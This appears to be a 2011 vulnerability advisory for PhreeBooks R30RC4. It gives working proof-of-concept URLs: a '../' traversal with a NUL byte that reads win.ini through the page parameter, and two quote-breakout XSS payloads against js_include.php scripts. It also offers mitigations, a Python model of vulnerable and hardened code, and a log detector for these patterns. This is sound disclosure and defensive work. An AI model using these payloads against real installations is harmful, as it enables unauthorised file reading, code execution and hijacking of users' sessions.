Vendor: PhreeBooks R30RC4
Author: AutoSec Tools
CVSS: 8.8 (HIGH)
Title: Local File Inclusion and Reflected Cross-site Scripting
CWE: 98 (Improper Control of Filename for Include/Require Statement), 79 (Improper Neutralization of Input During Web Page Generation)
Product Name: PhreeBooks R30RC4
Affected Version From: PhreeBooks R30RC4
Affected Version To: PhreeBooks R30RC4
Patch Exists: NO
Related CWE: N/A
CPE: a:phreebooks:phreebooks_r30rc4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
Year: 2011

PhreeBooks R30RC4 Local File Inclusion and Reflected Cross-site Scripting

PhreeBooks R30RC4 is vulnerable to Local File Inclusion and Reflected Cross-site Scripting. Both issues are reachable with a single crafted GET request and need no authentication in the PoCs below.

Local File Inclusion: the `page` parameter of `index.php` is used to build the path of a file that is then included. The PoC walks out of the application directory with repeated `../` sequences and terminates the path with a NUL byte (`%00`), so that any suffix the application appends after the parameter is discarded; on the tested XAMPP host it reads `windows/win.ini`. An attacker can read any file the web server process can read, such as configuration files, database credentials and application source. Because PHP's `include` executes PHP code found in the included file, the same bug becomes code execution if the attacker can place content in any file the server can reach (an upload, a log, a temporary file). The NUL-byte truncation only works on PHP releases before 5.3.4, which reject paths containing a NUL byte; the directory traversal itself is not affected by the PHP version.

Reflected Cross-site Scripting: the `form` parameter of the two `js_include.php` scripts is written unescaped into a JavaScript string inside a `<script>` block. Each PoC closes that string with a quote (`'` for the `popup_shipping` script, `"` for the `fedex_v7` script), appends `alert(0)`, and ends with `</script>` so the rest of the generated script does not raise a syntax error. A victim who opens such a link runs attacker-supplied JavaScript in the application's origin and can be made to act as that user.

Mitigation:

For the file inclusion: never build an include path from user input. Map the `page` parameter to an explicit allowlist of page names (or a fixed lookup table from name to file), reject any value not in the list, and as a second layer resolve the final path with `realpath()` and verify it lies under the pages directory before including it. Stripping `../` or NUL bytes from the input is not sufficient on its own, and upgrading PHP only removes the `%00` truncation, not the traversal.

For the cross-site scripting: encode the `form` parameter for the context it is written into. Inside a JavaScript string, emit it as a JSON-encoded literal (`json_encode()` with `JSON_HEX_TAG`, `JSON_HEX_APOS`, `JSON_HEX_QUOT` and `JSON_HEX_AMP`) so that neither a quote nor `</script>` can terminate the string or the script block; `htmlspecialchars()` alone is the wrong encoder for a script context. A Content-Security-Policy that disallows inline script limits the impact of any remaining encoding mistake.

No vendor patch is listed. Until one exists, requests to `index.php` whose `page` value contains `../` or `%00`, and requests to the two `js_include.php` scripts whose `form` value contains a quote or `<`, can be rejected at the web server or WAF.
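The following Python is an added example, not PhreeBooks or AutoSec Tools code. It models the two PoC requests from the advisory against the simplest PHP patterns that would produce them (an `include()` of a user-supplied page name with an appended extension, and a raw `echo` into a `<script>` block), shows the hardened replacements described above, and tags the PoC URLs as they would appear in a web server log. The `pages/` directory, the `.php` suffix, the page allowlist and the exact echo template are assumptions; the real PhreeBooks include logic is not shown on this page.

```python
"""
Added example (not PhreeBooks code): vulnerable vs. hardened handling of the
`page` and `form` parameters from the advisory, plus request classification.
PAGES_DIR, ALLOWED_PAGES and the ".php" suffix are assumptions.
"""
import json
import posixpath
from urllib.parse import unquote, unquote_plus, urlsplit

PAGES_DIR = "/var/www/phreedom/pages"           # assumed layout
ALLOWED_PAGES = {"index", "login", "customers"}  # assumed allowlist

# The advisory's PoC parameter values, copied verbatim (constructed input).
LFI_POC = "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00"
XSS_POC_1 = "';alert(0)%3C/script%3E"
XSS_POC_2 = "%22;alert(0)%3C/script%3E"


# --- Local File Inclusion ---------------------------------------------------

def vulnerable_resolve(page, php_pre_534=True):
    """Mimic include(PAGES_DIR . '/' . $_GET['page'] . '.php').

    Before PHP 5.3.4 the path reaches the C library as a NUL-terminated
    string, so everything after %00 (including the appended .php) is
    ignored; PHP 5.3.4 and later reject paths that contain a NUL byte.
    """
    path = PAGES_DIR + "/" + unquote(page) + ".php"
    if "\x00" in path:
        if not php_pre_534:
            raise ValueError("include(): path contains a NUL byte")
        path = path.split("\x00", 1)[0]
    return posixpath.normpath(path)


def safe_resolve(page):
    """Allowlist the page name, then check the final path stays in PAGES_DIR."""
    name = unquote(page)
    if name not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(PAGES_DIR, name + ".php"))
    if not path.startswith(PAGES_DIR + "/"):  # second layer, never reached by allowlisted names
        return None
    return path


# --- Reflected XSS in a JavaScript string context ---------------------------

def js_include_vulnerable(form):
    """Mimic echo "<script>var form = '" . $_GET['form'] . "';</script>";"""
    return "<script>var form = '" + unquote(form) + "';</script>"


def js_string_literal(value):
    """Emit a JS string literal that is safe inside an inline <script> block.

    json.dumps escapes quotes, backslashes and control characters but leaves
    '<' and '>' alone; the HTML parser ends a script block at the first
    '</script' regardless of JS quoting, so those are escaped as well.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def js_include_safe(form):
    """Hardened form: the value can only ever be a string, never code."""
    return "<script>var form = " + js_string_literal(unquote(form)) + ";</script>"


# --- Detection over request URLs -------------------------------------------

def query_params(url):
    """Split a query string on '&' only (older urllib also split on ';',
    which would cut the XSS payload in two) and percent-decode each part."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def classify_request(url):
    """Tag a request URL with the attack patterns from the advisory's PoCs."""
    params = query_params(url)
    tags = set()
    for value in params.get("page", []):
        if "../" in value or "..\\" in value or "\x00" in value:
            tags.add("lfi")
    for value in params.get("form", []):
        if "</script" in value.lower() or value[:1] in ("'", '"'):
            tags.add("xss")
    return tags


if __name__ == "__main__":
    print(vulnerable_resolve(LFI_POC))   # resolves outside PAGES_DIR
    print(safe_resolve(LFI_POC))         # None: not an allowlisted page
    print(js_include_vulnerable(XSS_POC_1))
    print(js_include_safe(XSS_POC_1))
```

`vulnerable_resolve` reproduces why the PoC works: the eight `../` climb from the assumed pages directory to the filesystem root and the NUL byte drops the appended `.php`. In `js_include_vulnerable`, the second PoC's `"` does not close a single-quoted string, which is why the advisory carries one payload per script; the trailing `</script>` terminates the block in either case. `classify_request` is the log-side check a defender would run over access logs before a patch is available.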
Source (Exploit-DB raw data):

------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Local File Inclusion
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00


------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Reflected Cross-site Scripting
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/modules/shipping/pages/popup_shipping/js_include.php?form=';alert(0)%3C/script%3E

http://localhost/phreedom/modules/shipping/methods/fedex_v7/label_mgr/js_include.php?form=%22;alert(0)%3C/script%3E